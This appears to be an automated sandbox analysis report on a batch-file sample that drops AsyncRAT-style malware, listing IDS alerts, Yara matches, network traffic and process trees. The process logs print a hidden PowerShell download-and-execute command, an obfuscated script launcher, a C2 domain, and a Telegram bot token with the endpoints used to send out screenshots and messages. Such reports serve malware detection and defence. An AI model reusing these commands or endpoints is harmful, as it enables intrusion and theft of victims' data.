MIIE8jCCAtqgAwIBAgIQAOQb7nA/hP/L1XXxqdDJNzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjMwNTI1MDUyMTIyWhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIykAVxs0s6rZ/dwP6ujJtpnj6RSsCsZN6Cfj1InZxSIswX+zNiKJys8xyLlyexoya3ebLp5gOSzNvGMlxluLm9vCaayOzt8HuaCCUFntv/AIiigkbE2gqVYjh7qdObXhyhAgjuygHDP0QCc+VzP1aVH4CesUy1gGvxgOgmdXok2AjCssH69OYGA/DAdEzaOK7TtFqS2qqCzCldLuNBa2xy0/Yb73Zko42hlx+hvp/ciTNyFDXqIBdUIu/6X3on+ecdW8SiLMjzr8Xf1BHcoVgTbDto7EpNq2a1b2CjI23YMlc+mRq33k6R2Dw0NNZmNdnTjnFFVmZZ419g2qIxR+JetlOui7Lc77pKX5Om0+HBZqQYKTCxMVykxz0G7EuAxIXG01Wlogv1Ulj31UH2APYQpgRyZ2DUhqJ1Ls3MLxd3X4UJ00DLnhOQf4bSxqZityJ+17tFLj/qSw8niWYm9lzor2652DmCyw2tFMOnkrnBStNaymtyE5JiN3hZ+3xLlCShjHbR6ANpnmPJJWyUnVLHzYj9Fg5cVrfcIHfGDxkh6P/x32CuG1uzxFS0NsZIG6dsiNmBJLZ/B+JQp2V5a1ux3bwzlgEd3OYdDAf8KzXjFmnhfLqhBN/e33eAYdLtZ5ijj9VTACHiEA73NNTROv+9MrHe+jlDqDX+JFS2HTRktAgMBAAGjMjAwMB0GA1UdDgQWBBSGuCNUrBGiR5cyCuX6uVeVEgA8yDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBBMeYWK/JJKSBUsQ4Ba2RHStyT+uunyfCP9ht58sDUygZWxFQxl4Tmw1JLTRjU2FNia9d73P3k7BuDux/zSWJy0rc+Yr5H174M86L7rXyM/dhyZ26Ansn3rxNG7OJP+UQh559z7wwa5sVstFlVyAZOYFBUGGGMhCK/odXhRgJxnWwPR5LKzbQKGXNsvYfnyjWsh65631ZSMvoH3eblBluOwhvCHP7MotRPD8xkmMfIL9npMprJRPHco5MnenLv9c1R6x7AS93fEh359l3fOdL1LTU5K7Q0FydPztV19HDkJyotROS1hOiWze1LNQLXQ6701jb20bIcxeeWyfzJSew1p6j/iIvbBBEKoeQVx6gCXN2UHfZRzeoQKzWQPJ9EDaobDIZ6VyBJ3Vg2zCuFtLL73oJzycow0Rudn/2O9FHy6rucrLcyWxi4AiH+a0b2l1GwvZ/46TUdGFvygMflzdSxf/sVeCrYOTxXJBAnCyz1Yx5hcFI/lblBL70necTt0FDnwHQSWyrdouWYWlGupZ9HUKg6IpGEg9tx0mwyvIycHXTeeQ+NVHYR+WmbVcgYy5HIMPPOyAV7FVCjvRfQ9GofgzRasjDKSqMeWChkMC2zMjI6j6WzWDK5ZD6mCcTiP5P0f3tOkYV/+cw2elMNBmmDAnZVPwweENRxZ/YelFug7Q==
Source: 20.2.powershell.exe.16966443638.1.raw.unpack	String decryptor: UbsISxSwsXxRgb91RviZzMhHqDltHmav3T9EWPkVEATgKyAZldGVksIP2PdPGEUQOq6fj/0Cv5gCtOkgj29fEDil7MO8dnYo/TmAfzWkVpK/m2g4nNzw0KS35sqY6t6vmfeUBBA4d9d0azZl8Uu/jVy2gkA4SqBX0crvsYR+47ispp37PcVxwEotMgUQCceZTcGZTqDDOiDLt7RoLsVXlKuA1CPlY9/+HwSU/rnqPsV4tZYpraBn/aW4/NwsZekj0r1lkN3f+fCOtiWLZNSCS08CgXiih4/kjVDXSDN6Uf0KOgtnWCZneDs+4B+e9aNC9TGNWQqqpTvg22Nb6rmvDY5S2ttqqE5cM56GQF+MQxUXYFlSxvsOeWPJAlHUqYdcMSnB0Lel0vLB3jgpEStfbVNWSmE1sMe7I0lILti2fChot4p/YpyTVlbr+99nUKl7st2gtZdua6rMZtO6CLFD1D7CIDGlj2hcgEB2BOphPwearpR21TezZFO7Z8XI/TC2gZFyVPTCn6tcGiwtJH0h7nx9jfff1I83kau+j+uYsAIkJZZatNux1FDsaT/BqdSXFa5IQ7S+PZuWxpO5Mw3yrSC6c8SXywKuWeXpA/BesNYaCqcMSW/rD0NtiJzteRInugp/+I3oFW7diCT2dxyVPLlEYBby+lx5UCwKxgJ8S2Y=
Source: 20.2.powershell.exe.16966443638.1.raw.unpack	String decryptor: false
Source: 20.2.powershell.exe.16966443638.1.raw.unpack	String decryptor: true
Source: 20.2.powershell.exe.16966443638.1.raw.unpack	String decryptor: null
Source: 20.2.powershell.exe.16966443638.1.raw.unpack	String decryptor: false
Source: 20.2.powershell.exe.16966443638.1.raw.unpack	String decryptor: DOOOOOOONE2025

Source: unknown	HTTPS traffic detected: 23.235.204.134:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2147594470.000002D0EA515000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb364e35T source: powershell.exe, 00000003.00000002.2150967102.000002D0EAD42000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2150967102.000002D0EAD42000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: powershell.exe, 00000003.00000002.2156086664.000002D0EADCD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb06-23.cr source: powershell.exe, 00000003.00000002.2150967102.000002D0EAD42000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2150967102.000002D0EAD52000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbn source: powershell.exe, 00000003.00000002.2150967102.000002D0EAD42000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb@ source: powershell.exe, 00000003.00000002.2150967102.000002D0EAD52000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb=u source: powershell.exe, 00000003.00000002.2156086664.000002D0EADC2000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 128.90.59.133:6161 -> 192.168.2.4:49741
Source: Network traffic	Suricata IDS: 2030673 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 128.90.59.133:6161 -> 192.168.2.4:49741
Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 128.90.59.133:6161 -> 192.168.2.4:49741
Source: Network traffic	Suricata IDS: 2035607 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 128.90.59.133:6161 -> 192.168.2.4:49741
Source: Network traffic	Suricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.4:49740 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49739 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1800011 - Severity 1 - Joe Security MALWARE njRAT - Telegram Checkin : 192.168.2.4:49739 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: ohsexoh.freeddns.org

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.4:49741 -> 128.90.59.133:6161

Source: global traffic	HTTP traffic detected: GET /x1ffqzjq.fup/f5cjxaxo.jpg HTTP/1.1Host: alasfar-atc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary=16fb4bd4-6f53-4e74-bc25-f11d6832edcaHost: api.telegram.orgContent-Length: 673882

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Source: Joe Sandbox View

ASN Name: INMOTI-1US INMOTI-1US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ipinfo.io

Source: Network traffic

Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49738 -> 34.117.59.81:443

Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: api.telegram.orgContent-Length: 267Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /x1ffqzjq.fup/f5cjxaxo.jpg HTTP/1.1Host: alasfar-atc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ipinfo.ioConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: alasfar-atc.com
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: ohsexoh.freeddns.org

Source: unknown

HTTP traffic detected: POST /bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: api.telegram.orgContent-Length: 267Connection: Keep-Alive

Source: powershell.exe, 00000003.00000002.2150967102.000002D0EAD19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: aspnet_compiler.exe, 00000015.00000002.4157158039.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: aspnet_compiler.exe, 00000015.00000002.4157158039.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000003.00000002.1970750932.000002D081600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io
Source: powershell.exe, 00000014.00000002.1917706450.0000016967E99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1917706450.0000016968A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2064757512.000001697D090000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000014.00000002.1917706450.0000016967499000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://localhost:3030/Service.asmx
Source: powershell.exe, 00000003.00000002.2122928090.000002D090075000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1970750932.000002D080229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1970750932.000002D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1917706450.0000016964BD1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000015.00000002.4165262476.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1970750932.000002D080229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1970750932.000002D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1917706450.0000016964BD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.2145516549.000002D0EA450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg
Source: powershell.exe, 00000003.00000002.1970750932.000002D08058A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: powershell.exe, 00000003.00000002.1970750932.000002D08058A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot$BotToken/sendMessage
Source: powershell.exe, 00000003.00000002.1970750932.000002D08058A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot$BotToken/sendPhoto
Source: powershell.exe, 00000003.00000002.1970750932.000002D08058A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendMessage
Source: powershell.exe, 00000003.00000002.1970750932.000002D08058A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendPhoto
Source: powershell.exe, 00000003.00000002.1970750932.000002D08058A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgx
Source: powershell.exe, 00000003.00000002.2122928090.000002D090075000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2122928090.000002D090075000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2122928090.000002D090075000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1970750932.000002D080229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1970750932.000002D0817DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1917706450.0000016965C3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000014.00000002.2060343037.000001697CCEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.c
Source: powershell.exe, 00000003.00000002.1970750932.000002D0817DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.i
Source: powershell.exe, 00000003.00000002.1970750932.000002D081600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io
Source: powershell.exe, 00000003.00000002.1970750932.000002D08058A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/json
Source: powershell.exe, 00000003.00000002.1970750932.000002D0817DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/missX
Source: powershell.exe, 00000003.00000002.1970750932.000002D0817C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1970750932.000002D0817CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1970750932.000002D0817D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1970750932.000002D0803D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1970750932.000002D0817DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/missingauth
Source: powershell.exe, 00000003.00000002.2122928090.000002D090075000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: aspnet_compiler.exe, 00000015.00000002.4165262476.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/xworm_v2

Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 23.235.204.134:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 20.2.powershell.exe.1696705a0e0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966443638.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966427fe0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966427fe0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.1696705a0e0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966491660.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966491660.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.16966443638.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4155829420.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1917706450.0000016968A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1917706450.000001696616A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4165262476.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1917706450.000001696643C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 7440, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 27#U0646.bat, type: SAMPLE	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: amsi64_7584.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 20.2.powershell.exe.1696705a0e0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 20.2.powershell.exe.1696705a0e0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 20.2.powershell.exe.1696705a0e0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 20.2.powershell.exe.16966443638.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 20.2.powershell.exe.16966443638.1.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 20.2.powershell.exe.16966443638.1.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 20.2.powershell.exe.16966427fe0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 20.2.powershell.exe.16966427fe0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 20.2.powershell.exe.16966427fe0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 20.2.powershell.exe.16966427fe0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 20.2.powershell.exe.16966427fe0.4.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 20.2.powershell.exe.16966427fe0.4.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 20.2.powershell.exe.1696705a0e0.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 20.2.powershell.exe.1696705a0e0.5.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 20.2.powershell.exe.1696705a0e0.5.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 20.2.powershell.exe.16966491660.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 20.2.powershell.exe.16966491660.2.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 20.2.powershell.exe.16966491660.2.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 20.2.powershell.exe.16966491660.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 20.2.powershell.exe.16966491660.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 20.2.powershell.exe.16966443638.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 20.2.powershell.exe.16966443638.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000015.00000002.4155829420.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000015.00000002.4155829420.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000014.00000002.1917706450.0000016968A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000014.00000002.1917706450.0000016968A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000014.00000002.1917706450.000001696616A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000014.00000002.1917706450.000001696643C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7584, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: aspnet_compiler.exe PID: 7440, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\HTRFAAYAKOCE.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\UZKDPUUZKDPsUZKDPeUZKDPrUZKDPs\PUZKDPuUZKDPbUZKDPlUZKDPiUZKDPc\JGEBGEOPVP.ps1'.replace('UZKDP','')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')\|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\HTRFAAYAKOCE.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\UZKDPUUZKDPsUZKDPeUZKDPrUZKDPs\PUZKDPuUZKDPbUZKDPlUZKDPiUZKDPc\JGEBGEOPVP.ps1'.replace('UZKDP','')"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B89DAF6	3_2_00007FFD9B89DAF6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B89E8A2	3_2_00007FFD9B89E8A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B8A8B95	3_2_00007FFD9B8A8B95
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B8A8B0C	3_2_00007FFD9B8A8B0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 21_2_012BD404	21_2_012BD404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 21_2_07221B10	21_2_07221B10

Source: 27#U0646.bat, type: SAMPLE	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
